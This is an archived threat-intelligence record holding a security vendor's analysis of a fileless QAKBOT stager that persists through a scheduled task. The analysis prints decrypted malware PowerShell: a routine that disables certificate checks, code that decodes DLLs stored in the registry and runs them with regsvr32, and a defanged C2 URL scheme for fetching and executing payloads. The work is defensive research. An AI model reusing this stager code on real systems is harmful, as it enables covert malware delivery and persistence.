{
	"id": "761b9c83-e551-4ad9-9997-7557b3a8b279",
	"created_at": "2026-04-06T00:15:38.35182Z",
	"updated_at": "2026-04-10T03:20:39.159397Z",
	"deleted_at": null,
	"sha1_hash": "dcfcbc82fc2870ac9630bc39c40a029d95214c21",
	"title": "Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 196061,
	"plain_text": "Staging a Quack: Reverse Analyzing a Fileless QAKBOT Stager\r\nPublished: 2021-12-17 · Archived: 2026-04-05 17:01:02 UTC\r\nWe analyzed a fileless QAKBOT stager possibly connected to the recently reported Squirrelwaffle campaign.\r\nBy: Abraham Camba, Jonna Santos, Gilbert Sison, Jay Yaneza Dec 17, 2021 Read time: 4 min (1024 words)\r\nWe recently published how Squirrelwaffle emerged as a loader using two exploits in a recent spam campaign in\r\nthe Middle East. Further monitoring and analysis from our incident response and extended detection and response\r\nteams (IR/XDR) found that one of Squirrelwaffle’s payloads includes QAKBOT, a banking trojan and infostealer\r\nthat cybercriminals have been using since 2007.  \r\nDuring one of our threat hunting initiatives, we found a fileless QAKBOT stager capable of achieving persistence\r\non its own. Furthermore, while QAKBOT is one of the payloads it stages filelessly in the registry, the stager is\r\nalso capable of staging for more than one malware, a capability that can likely be abused for more campaigns in\r\nthe future.\r\nTechnical details\r\nFigure 1. Infection chain and timeline\r\nhttps://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\r\nPage 1 of 6\n\nWe found a suspicious PowerShell execution in an infected system in the following form:\r\nFigure 2. PowerShell execution observed\r\nWhen the code is obfuscated via base64, the command line parameter is usually long and noticeable via XDR. But\r\nthis specific execution is noticeably short and reads filelessly in the registry despite its base64 encoding.\r\nUsing Trend Micro™ Vision One™ with Managed XDR’s progressive root cause analysis (RCA), we were able to\r\ntrace back the execution to the legitimate process services.exe. It turns out that the suspicious PowerShell\r\nexecution is triggered via a scheduled task.\r\nFigure 3. Tracking the suspicious execution with Trend Micro Vision One\r\nFigure 4. A scheduled task triggered the PowerShell execution.\r\nThe PowerShell command is an example of a fileless technique wherein the actual command is stored in the\r\nregistry. In this case, it was stored in the registry entry HKCU:\\SOFTWARE\\Uiggvsbhwbcvhom).vqaryay, again\r\nencoded in base 64.\r\nBreaking down the decrypted strings\r\nWe decrypted and analyzed the encoded string and broke them down. The code’s variables seem to be obfuscated\r\nvia a randomizer, likely to circumvent detection to a certain extent.\r\n$KtdH = \"{E6CF5F45-43D0-4514-96DE-151BD04A9079}\" \u003c-- Mutex Name\r\n$PgZYjDK = \"qafsdb378960\" \u003c-- URL parameter (seems to be an ID)\r\n$d_IP = \"/zkr\" \u003c-- URL path\r\n$LngwgFRytJ = \"jhysoq\" \u003c-- Registry Entry 1\r\nhttps://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\r\nPage 2 of 6\n\n$awwWcsGQX = \"gqdmzka\" \u003c-- Registry Entry 2\r\n$g_JXBUAMH = \"irwtoakzd\" \u003c-- Registry Entry 3\r\n$WQudUrNwDr = \"daedvnjlph\" \u003c-- Registry Entry 4 (Date Entry)\r\n$tvDQbLr = \"HKCU:\\SOFTWARE\\Uiggvsbhwbcvhom\" \u003c-- Registry Key\r\nThe next set of code sets PowerShell to skip secure sockets layer (SSL) certificate checks, bypassing the inherent\r\nsecurity protocol.\r\nadd-type @\"\r\n    using System.Net;\r\n    using System.Security.Cryptography.X509Certificates;\r\n    public class TrustAllCertsPolicy : ICertificatePolicy {\r\n        public bool CheckValidationResult(\r\n            ServicePoint srvPoint, X509Certificate certificate,\r\n            WebRequest request, int certificateProblem) {\r\n            return true;\r\n        }\r\n    }\r\n\"@\r\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\r\nThe string then checks for mutex to ensure a single execution, which is the usual for malware implementations. It\r\nalso checks if the date is already set in registry entry 4. While the exact date is insignificant, it serves as a marker\r\nfor this fileless malware. If the marker is not yet set, it will proceed with a drop-and-execute routine. Otherwise, it\r\nskips a routine. \r\nfunction UQTV()\r\n{\r\n    $MwmmBxnVjO = Get-Random\r\n    $RBnYwaG = (Get-ItemProperty -Path $tvDQbLr).$LngwgFRytJ\r\n    if ($RBnYwaG) {\r\n        $_f_zhkPw = \"$env:TEMP\\\\$($MwmmBxnVjO)1.dll\"\r\nhttps://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\r\nPage 3 of 6\n\n$fPsS = [System.Convert]::FromBase64String($RBnYwaG)\r\n        [System.IO.File]::WriteAllBytes($_f_zhkPw, $fPsS)\r\n        Start-Process -FilePath \"regsvr32.exe\" -ArgumentList \"$_f_zhkPw\"\r\n    } else {\r\n    }\r\n    $OlKwHqqEa = (Get-ItemProperty -Path $tvDQbLr).$awwWcsGQX\r\n    if ($OlKwHqqEa) {\r\n        $_f_zhkPw = \"$env:TEMP\\\\$($MwmmBxnVjO)2.dll\"\r\n        $fPsS = [System.Convert]::FromBase64String($OlKwHqqEa)\r\n        [System.IO.File]::WriteAllBytes($_f_zhkPw, $fPsS)\r\n        Start-Process -FilePath \"regsvr32.exe\" -ArgumentList \"$_f_zhkPw\"\r\n    } else {\r\n    }\r\n}\r\nDepending on which registry entry is present (either registry entry 1 or 2), the string will drop and execute via\r\nregsvr32.exe a dynamic link library (DLL) file that was filelessly stored in either registry entry 1 or 2. We\r\nobserved the DLL file is a QAKBOT variant.\r\nAt this point, it’s easy to assume that the stager is done since it has already dropped the main payload. We\r\nobserved that at this stage, it has only performed half of its purpose. Continuing with the decrypted code, we see\r\nthis:\r\n$PNpOl = (Get-ItemProperty -Path $tvDQbLr).$g_JXBUAMH\r\nif (!$PNpOl) {\r\n    exit\r\n}\r\n$mbATsNmtaw = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($PNpOl))\r\n$anvsPJMJpe = 0;\r\n$DXSMgDi = $mbATsNmtaw.Split(\";\")\r\nforeach ($qtNuK_ in $DXSMgDi) {\r\nhttps://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\r\nPage 4 of 6\n\n__NOxzyOQT $qtNuK_\r\n    if ($global:rcxEcF -eq 1) {\r\n        break\r\n    }\r\n    $anvsPJMJpe++\r\n}\r\nexit 0 \r\nThe stager reads registry entry 3, and the content of this registry is another encoded string. When decrypted, the\r\nstring is a list of combined IP addresses and ports. Configured in the memory, the stager would have access to the\r\nURL format of hxxps[:]//\u003cIP\u003e:\u003cPort\u003e/zkr?n=qafsdb378960, where it would take three parameters:\r\nThe first parameter is for the switch case\r\n1. Execute via regsvr32.exe \r\n2. Execute via Start-Process (exe)\r\n3. Execute via invoke-expression (IEX)\r\n4. Execute via cmd.exe\r\n5. Execute via Start-Process (bat)\r\n6. Execute via Start-Process (vbs)\r\nThe second parameter is for error handling.\r\nThe third parameter is for the content of the PE file to be downloaded and executed.\r\nConclusion\r\nWhile we observed this fileless stager only deploying QAKBOT, the stager also serves as a stager for other\r\nmalware. It also achieves persistence via a scheduled task, which means it can also deploy multiple types of\r\nmalware as deemed necessary by the cybercriminals behind this stager, with each malware execution triggered\r\nwith the scheduled task.\r\nThere were instances where QAKBOT has tried to hide its tracks by being fileless. However, this is the first time\r\nwe have encountered this kind of fileless stager with persistence, and having the capability to move laterallynews\r\narticle and download other types of malware such as ransomware. Security teams are advised to reinforce and\r\nenable their monitoring mechanisms for better visibility of fileless malware artifacts, suspicious variables, and\r\nmalicious processes.\r\nTrend Micro solutions\r\nUsers can also opt to protect systems through managed detection and response (MDR)products, which enables the\r\nexpertise of skilled cybersecurity personnel capable of reading at and between data gathered by advanced artificial\r\nintelligence and machine learning technology to correlate and prioritize threats, determining if they are part of a\r\nhttps://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\r\nPage 5 of 6\n\nlarger attack. Combined with the visibility to track and monitor both malicious and legitimate processes abused\r\nfor fileless threats and routines in siloed systems, MDR can detect threats before they are executed, preventing\r\nfurther compromise and mitigating the risks of an attack’s lateral spread.\r\nIndicators of Compromise (IOCs)\r\nView the full list of IOCs hereopen on a new tab.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\r\nhttps://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/l/staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html"
	],
	"report_names": [
		"staging-a-quack-reverse-analyzing-fileless-qakbot-stager.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434538,
	"ts_updated_at": 1775791239,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dcfcbc82fc2870ac9630bc39c40a029d95214c21.pdf",
		"text": "https://archive.orkl.eu/dcfcbc82fc2870ac9630bc39c40a029d95214c21.txt",
		"img": "https://archive.orkl.eu/dcfcbc82fc2870ac9630bc39c40a029d95214c21.jpg"
	}
}